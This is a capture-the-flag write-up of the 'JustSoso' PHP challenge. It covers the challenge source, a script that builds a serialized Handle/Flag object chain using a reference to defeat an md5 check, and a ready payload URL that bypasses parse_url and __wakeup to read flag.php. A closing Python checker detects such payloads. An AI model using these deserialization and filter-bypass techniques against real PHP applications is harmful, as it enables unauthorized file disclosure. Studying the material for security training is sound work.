JustSoso Notes

Time: 2021-12-03 18:46:44

At the time I thought about it for half a day, wondering how on earth to bypass the MD5, and in the end I still didn't solve it. Even after asking a senior student I still missed one step, file=hint.php, so I'm writing it down here. I also learned something new about reference variables.

Learned from https://www.ctfwp.com/articals/2019national.html

View the source

We can tell it is a PHP include problem, so read the source with the php://filter wrapper (the source below is what I saved in my editor at the time).

index.php
<html>
<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];
if(!isset($file)){
    echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
    die('hack attacked!!!');
}
@include($file);
if(isset($payload)){
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/flag/",$value)) {
            die('stop hacking!');
            exit();
        }
    }
    $payload = unserialize($payload);
}else{
   echo "Missing parameters";
}
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->
</html>

hint.php
<?php
class Handle{
    private $handle;
    public function __wakeup(){
        foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
    public function __construct($handle) {
        $this->handle = $handle;
    }
    public function __destruct(){
        $this->handle->getFlag();
    }
}

class Flag{
    public $file;
    public $token;
    public $token_flag;

    function __construct($file){
        $this->file = $file;
        $this->token_flag = $this->token = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
        {
            if(isset($this->file)){
                echo @highlight_file($this->file,true);
            }
        }
    }
}
?>

This is evidently a PHP deserialization challenge, so look at the source: the Handle class has a constructor and a destructor, and the destructor calls the getFlag() method of the Flag class. So we can pass a new Flag into new Handle; that runs Flag's constructor, and when Handle is destructed it calls getFlag() on the Flag. But I couldn't think of a way to make the two md5 values exactly equal; after reading the writeup I found that it uses the idea of reference variables (https://blog.csdn.net/qq_33156633/article/details/79936487).

Simply put, when a variable is a reference, both variables point to the same address: with $b=&$a, $b also points to $a's storage and changes whenever $a changes.


With objects, however, you don't need the &; passing an object is effectively passing by reference.

So back to this challenge: if we add $this->token = &$this->token_flag in Flag's constructor, then no matter what is assigned later, the two properties point to the same storage, so their values are always equal and the md5 comparison is passed. serialize() records such a reference as an R:n back-reference and unserialize() restores it, which is why the trick survives the round trip. The solution source is as follows:

//hint.php

<?php
class Handle{
    private $handle;
    public function __wakeup(){
        foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
    public function __construct($handle) {
        $this->handle = $handle;
    }
    public function __destruct(){
        $this->handle->getFlag();
    }
}

class Flag{
    public $file;
    public $token;
    public $token_flag;

    function __construct($file){
        $this->file = $file;
        $this->token_flag = $this->token = md5(rand(1,10000));
        // make token a reference to token_flag so the two always hold the same value
        $this->token = &$this->token_flag;
    }

    public function getFlag(){
        $this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
        {
            if(isset($this->file)){
                echo @highlight_file($this->file,true);
            }
        }
    }
}

$a = new Flag("flag.php");
$b = new Handle($a);
echo serialize($b);
?>

Output: O:6:"Handle":1:{s:14:"Handlehandle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"91bc333f6967019ac47b49ca0f2fa757";s:10:"token_flag";R:4;}}

(The private property name is really "\0Handle\0handle"; the two null bytes are invisible here but are counted in the length 14.)

When submitting, we also have to get past parse_url (http://www.am0s.com/functions/406.html) and the __wakeup magic method; for the latter, declaring a property count larger than the real number of members is enough.

payload: ///?file=hint.php&payload=O:6:"Handle":2:{s:14:"Handlehandle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"91bc333f6967019ac47b49ca0f2fa757";s:10:"token_flag";R:4;}}
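As an added example (not part of the original notes or the challenge code), here is a small Python checker that inspects a PHP serialized string without ever calling unserialize(): it numbers value slots the way PHP does (every value except an R: back-reference takes a slot, property names do not), resolves R:n to the property it aliases, and flags an object whose declared property count does not match the number of properties actually present, which is exactly the __wakeup-bypass pattern in the payload above. It only handles the s, O and R types the payload uses; the sample string is the writeup's payload with the two NUL bytes restored.

```python
import re

class PhpSerializedChecker:
    # Walks PHP serialize() output for the s, O and R types without instantiating anything.
    # Slots are numbered as unserialize() numbers them: every value except R: takes one.
    def __init__(self, data: bytes):
        self.data, self.pos, self.slots, self.findings = data, 0, [], []

    def take(self, pattern: bytes) -> bytes:       # consume a regex match at the cursor
        m = re.compile(pattern).match(self.data, self.pos)
        if not m:
            raise ValueError(f"unexpected input at offset {self.pos}")
        self.pos = m.end()
        return m.group(1) if m.groups() else m.group(0)

    def string(self) -> str:                        # s:<len>:"<bytes>";  length-prefixed
        n = int(self.take(rb's:(\d+):"'))
        s, self.pos = self.data[self.pos:self.pos + n], self.pos + n
        self.take(rb'";')
        return s.decode("latin-1")

    def value(self, path="$"):
        if self.data.startswith(b"R:", self.pos):   # back-reference to an earlier slot; takes none itself
            n = int(self.take(rb"R:(\d+);"))
            if not 1 <= n <= len(self.slots):
                self.findings.append(f"{path}: R:{n} points outside the {len(self.slots)} slots seen")
                return None
            self.findings.append(f"{path} aliases slot {n} ({self.slots[n - 1][0]})")
            return self.slots[n - 1][1]
        slot = [path, None]                         # reserve the slot before parsing any children
        self.slots.append(slot)
        if self.data.startswith(b"s:", self.pos):
            slot[1] = self.string()
        else:
            cls = self.take(rb'O:\d+:"([^"]+)":').decode()
            declared = int(self.take(rb"(\d+):\{"))
            slot[1] = obj = {"class": cls, "declared": declared, "props": {}}
            while not self.data.startswith(b"}", self.pos):
                key = self.string().replace("\0", "")   # private/protected names carry \0 markers
                obj["props"][key] = self.value(f"{path}.{key}")
            self.pos += 1
            if len(obj["props"]) != declared:
                self.findings.append(f"{path}: {cls} declares {declared} properties but carries "
                                     f"{len(obj['props'])} (__wakeup-bypass pattern)")
        return slot[1]

def check_payload(payload: bytes):
    p = PhpSerializedChecker(payload)
    return p.value(), p.findings

# Constructed sample: the writeup's payload with the NUL bytes around the private property's class name restored.
SAMPLE = (b'O:6:"Handle":2:{s:14:"\x00Handle\x00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";'
          b's:5:"token";s:32:"91bc333f6967019ac47b49ca0f2fa757";s:10:"token_flag";R:4;}}')
```

Running check_payload(SAMPLE) reports that token_flag aliases token (slot 4) and that Handle declares 2 properties but carries only 1; the same string with the count corrected to 1 produces only the alias finding.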

(Remember file=hint.php; that is the part I forgot at the time. hint.php has to be included so that its PHP code actually runs, which is the normal way to solve it. And the top players are really something: they managed RCE plus a race condition, impressive. The writeup collection site linked at the top explains it.)